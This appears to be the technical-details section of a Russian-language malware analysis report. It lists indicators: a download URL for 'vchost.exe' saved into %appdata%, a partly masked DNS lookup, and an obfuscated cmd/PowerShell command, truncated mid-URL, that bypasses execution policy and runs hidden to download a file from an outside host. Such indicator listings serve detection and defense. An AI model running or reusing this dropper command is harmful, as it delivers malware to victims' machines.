Техническая информация
- http://kesigcse.org/uploadedfiles/vchost.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWERshELL.e^xE -EXE^c^uTI^ON^POLI^CY^ ByP^aSs^ ^-^noProf^il^e^ -WInd^Ows^TYLe ^hIDdeN ^(N^e^W^-obJ^eCt ^SysTem^.NET.WE^BCLIent^)^.do^WnlOad^File('http://kesigcse.org/Uplo...
- DNS ASK ke###cse.org
- '<SYSTEM32>\cmd.exe' /c "PoWERshELL.e^xE -EXE^c^uTI^ON^POLI^CY^ ByP^aSs^ ^-^noProf^il^e^ -WInd^Ows^TYLe ^hIDdeN ^(N^e^W^-obJ^eCt ^SysTem^.NET.WE^BCLIent^)^.do^WnlOad^File('http://kesigcse.org/Uplo...' (со скрытым окном)